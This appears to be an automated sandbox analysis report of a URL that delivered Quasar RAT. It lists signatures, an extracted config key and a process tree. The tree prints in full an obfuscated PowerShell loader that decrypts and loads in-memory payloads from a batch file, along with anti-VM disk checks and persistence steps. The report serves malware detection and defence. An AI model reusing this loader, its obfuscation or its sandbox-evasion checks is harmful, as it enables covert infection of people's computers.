Analysis
-
max time kernel
106s -
max time network
117s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
04-01-2025 18:10
General
-
Target
https://oceanwave.lol/
Malware Config
Extracted
quasar
-
encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 3 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 8 IoCs
-
Modifies data under HKEY_USERS 14 IoCs
-
Modifies registry class 29 IoCs
-
NTFS ADS 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 35 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{caf5558e-8b68-4a77-9cbd-644f7a3ed5d5}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{708ee3e1-80a3-4fed-90e7-f47b3b03303b}2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://oceanwave.lol/2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd11023cb8,0x7ffd11023cc8,0x7ffd11023cd83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3424 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14211368527256018681,3432501653439779793,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Loader\Loader.bat2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loader\Loader.bat" "2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\Desktop\Loader\Loader.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2324 -s 19124⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\Desktop\Loader\Loader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2708 -s 25126⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2708 -s 25646⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\nQAhvv.exe"C:\Windows\$nya-onimai2\nQAhvv.exe"2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 2324 -ip 23242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 2708 -ip 27082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
